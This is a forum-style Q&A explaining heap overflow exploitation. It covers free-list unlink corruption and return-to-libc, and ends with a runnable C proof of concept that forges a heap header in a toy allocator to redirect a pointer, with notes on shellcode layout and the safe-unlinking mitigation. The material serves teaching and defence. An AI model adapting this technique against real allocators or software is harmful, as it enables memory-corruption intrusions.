How are heap overflow attacks executed?
In the case of stack overflow attacks, the attacker replaces the function return address with his address of choice.
How is this done in the case of a heap overflow attack? Also, is it possible to run code from the heap?
Heap overflow attack - This type of attack targets data in the dynamically allocated memory pool known as the heap. Integer overflow attack - When an integer overflows, an arithmetic operation produces a value too large for the integer type to hold, so the stored result wraps around; if that wrapped value is then used as a length or allocation size, it can lead to a buffer overflow.
An integer overflow attack can occur when an integer is used in an arithmetic operation and the true result exceeds the maximum value the type can represent. For example, an unsigned 8-bit integer can hold at most 255: adding 64 to 192 wraps around to 0, and a buffer sized from that result would be far too small for the data later copied into it.
There are two types of buffer overflows: stack-based and heap-based. Heap-based overflows, which are generally harder to exploit and the less common of the two, corrupt memory by writing past the end of a dynamically allocated buffer into adjacent heap data or allocator bookkeeping.
A heap overflow attack is a type of buffer overflow attack that specifically targets the heap, as its name implies. In these attacks, data in the heap is overwritten to corrupt neighbouring objects or the allocator's own metadata, and that corruption is then used to subvert the program.
Note this varies by platform, and my example is overly simplified. It basically comes down to heap managers having linked lists that could be overrun, and you can use the linked list pointers to overwrite random parts of the process's memory.
Imagine I have a naive heap implementation whose control blocks are like this:
struct HeapBlockHeader
{
    HeapBlockHeader* next;   // next block on the free list
    HeapBlockHeader* prev;   // previous block on the free list
    int size;                // size of the buffer that follows
    // Actual heap buffer follows this structure.
};
When the heap block gets freed, this control block goes back into a list of freed blocks by modifying the next/prev pointers. If I overrun a heap buffer, I can overwrite the pointers in the next control block with data I control. Suppose I overwrite these links to point to a pointer to code (probably just in the buffer I overran) and to the return address of the function on the stack. When the heap manager tries to link the block back into a freed list, it will actually overwrite the return address on the stack with a pointer to code I control.
This article has a nice overview on heap overflow attacks: http://www.h-online.com/security/features/A-Heap-of-Risk-747161.html
This article describes some of the hardening that went into Vista's heap manager to prevent this sort of attack: http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Marinescu.pdf
EDIT: On the possibility of running code from the heap: yes, it is possible. Many platforms now make heap memory non-executable by default, which raises the barrier to getting arbitrary code to run. However, you can still do a "jump to libc" style attack - overwrite the return address to a known function which will be executable.
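The unlink write-what-where described in the answer, as a runnable C program. This is an added example, not code from the question or the answer: the allocator (toy_malloc/toy_free/unlink_block), the in_use flag, the two-block arena and the target variable banner are all assumptions made for the demo, and the attacker input is constructed inline. The target is a plain data pointer rather than a return address so that the program runs under a non-executable heap; the mechanism (two pointer writes whose destinations come from a corrupted header) is the same.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Naive allocator in the spirit of the answer's HeapBlockHeader: a header in
 * front of every buffer, free blocks on a doubly-linked list, and no sanity
 * checks on the links. Everything here is a toy built for this demo. */
struct HeapBlockHeader {
    struct HeapBlockHeader *next;   /* next block on the free list */
    struct HeapBlockHeader *prev;   /* previous block on the free list */
    size_t size;                    /* user bytes that follow the header */
    int in_use;                     /* 0 = free, 1 = handed out by toy_malloc */
};

#define HDR     sizeof(struct HeapBlockHeader)
#define BLOCK   64                  /* user bytes per block */
#define NBLOCKS 2

static _Alignas(struct HeapBlockHeader) unsigned char arena[NBLOCKS * (HDR + BLOCK)];
static size_t bump;                 /* first unused byte of the arena */
static struct HeapBlockHeader free_list = { &free_list, &free_list, 0, 0 };

/* The attacker's target (hypothetical): in a real exploit a return address,
 * GOT slot or function pointer; a data pointer keeps the demo NX-friendly. */
static const char *banner = "normal banner";

static void *toy_malloc(void) {
    if (bump + HDR + BLOCK > sizeof arena) return NULL;
    struct HeapBlockHeader *h = (struct HeapBlockHeader *)(arena + bump);
    bump += HDR + BLOCK;
    h->next = h->prev = NULL;
    h->size = BLOCK;
    h->in_use = 1;
    return (unsigned char *)h + HDR;
}

/* The unsafe unlink this attack class abuses: two pointer-sized writes whose
 * destinations are read straight from the (corruptible) header. */
static void unlink_block(struct HeapBlockHeader *b) {
    struct HeapBlockHeader *n = b->next, *p = b->prev;
    n->prev = p;    /* write #1: *(next + offsetof(prev)) = prev */
    p->next = n;    /* write #2: *(prev + offsetof(next)) = next */
}

static void toy_free(void *ptr) {
    struct HeapBlockHeader *h = (struct HeapBlockHeader *)((unsigned char *)ptr - HDR);
    unsigned char *end = (unsigned char *)ptr + h->size;
    h->in_use = 0;
    /* Forward coalescing: if the physically next block says it is free, take
     * it off the free list and merge it. The check trusts the header. */
    if (end + HDR <= arena + bump) {
        struct HeapBlockHeader *nb = (struct HeapBlockHeader *)end;
        if (!nb->in_use) {
            unlink_block(nb);          /* <-- arbitrary write happens here */
            h->size += HDR + nb->size;
        }
    }
    h->next = free_list.next;
    h->prev = &free_list;
    free_list.next->prev = h;
    free_list.next = h;
}

const char *current_banner(void) { return banner; }

/* Returns 3 when both effects are observed: bit 0 = banner now points into
 * attacker data, bit 1 = write #2 clobbered the first bytes of that data. */
int run_unlink_attack(void) {
    char *a = toy_malloc();     /* buffer the vulnerable program copies into */
    char *b = toy_malloc();     /* physically adjacent block, still in use */
    if (!a || !b) return -1;

    /* Constructed attacker input: BLOCK bytes of payload, then a forged header
     * that lands exactly on top of b's real header. */
    unsigned char input[BLOCK + HDR];
    memset(input, 'A', BLOCK);
    /* Real shellcode starts with a short jump here, because write #2
     * destroys the first sizeof(void *) bytes of the payload. */
    memcpy(input + sizeof(void *), "pwned by unlink", 16);

    struct HeapBlockHeader forged;
    memset(&forged, 0, sizeof forged);
    /* "where": next = &banner - offsetof(prev), so write #1 lands on banner.
     * "what":  prev = address of the payload. */
    forged.next = (struct HeapBlockHeader *)((uintptr_t)&banner - offsetof(struct HeapBlockHeader, prev));
    forged.prev = (struct HeapBlockHeader *)a;
    forged.size = BLOCK;
    forged.in_use = 0;          /* lie: "b is free, please coalesce with it" */
    memcpy(input + BLOCK, &forged, HDR);

    /* The bug: an unbounded copy into a's BLOCK-byte buffer (think strcpy). */
    memcpy(a, input, sizeof input);

    toy_free(a);                /* coalesces with "free" b -> unlink_block(b) */

    int redirected = (banner == a);
    struct HeapBlockHeader *clobber;
    memcpy(&clobber, a, sizeof clobber);
    int clobbered = (clobber == forged.next);
    return redirected + 2 * clobbered;
}

int main(void) {
    printf("before: %s\n", current_banner());
    int r = run_unlink_attack();
    printf("after:  %s (result code %d)\n", current_banner() + sizeof(void *), r);
    return r == 3 ? 0 : 1;
}
```

Two things worth noticing when you run it: write #2 is not free, it overwrites the first pointer-sized bytes of whatever prev points at, which is why classic heap shellcode begins with a jump over its own first bytes; and the whole primitive depends on the allocator trusting next/prev. The "safe unlinking" check that hardened allocators added (verify next->prev == b and prev->next == b before unlinking) rejects the forged header above, which is the kind of mitigation the Vista heap paper linked in the answer describes.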